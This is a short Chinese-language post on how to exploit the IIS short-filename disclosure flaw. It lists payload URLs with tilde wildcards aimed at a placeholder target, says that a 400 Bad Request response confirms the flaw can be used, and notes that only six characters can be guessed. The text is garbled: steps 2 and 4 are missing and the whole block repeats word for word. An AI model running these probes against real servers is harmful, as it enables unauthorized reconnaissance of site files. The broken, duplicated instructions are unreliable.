IIS网站短文件名泄露漏洞的利用方法
1、构造payload查看是否具有漏洞1. http://www.target.com/*~1****/a.aspx2. http://www.target.com/l1j1e*~1****/a.aspx
3、进一步确认,如果输入不存在的字母出现400 bad request 确认可以利用
5、这个漏洞只能猜解6个字母,还是有一定局限性的,希望对你有帮助
1、构造payload查看是否具有漏洞1. http://www.target.com/*~1****/a.aspx2. http://www.target.com/l1j1e*~1****/a.aspx
3、进一步确认,如果输入不存在的字母出现400 bad request 确认可以利用
5、这个漏洞只能猜解6个字母,还是有一定局限性的,希望对你有帮助